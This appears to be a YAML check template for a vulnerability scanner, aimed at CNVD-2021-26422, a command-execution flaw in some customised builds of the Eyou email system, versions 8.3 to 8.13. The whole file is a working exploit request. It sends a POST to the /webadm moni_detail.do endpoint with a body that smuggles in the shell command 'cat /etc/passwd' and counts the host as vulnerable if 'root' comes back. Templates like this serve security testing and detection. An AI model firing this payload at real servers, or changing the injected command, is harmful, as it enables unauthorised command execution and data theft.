name: CNVD-2021-26422-亿邮电子邮件系统
description: "V8.3-V8.13的部分二次开发版本可任意命令执行"
method: POST
body: "type='|cat /etc/passwd||'"
headers:
  Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
  Accept: "*/*"
  X-Requested-With: "XMLHttpRequest"
  Agent:  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
  Encoding: "gzip, deflate"
  Accept-Language:  "zh-CN,zh;q=0.9"
  Connection: "close"
path:
  - /webadm/?q=moni_detail.do&action=gragh
expression:
  status: 200
  body_all:
    - "root"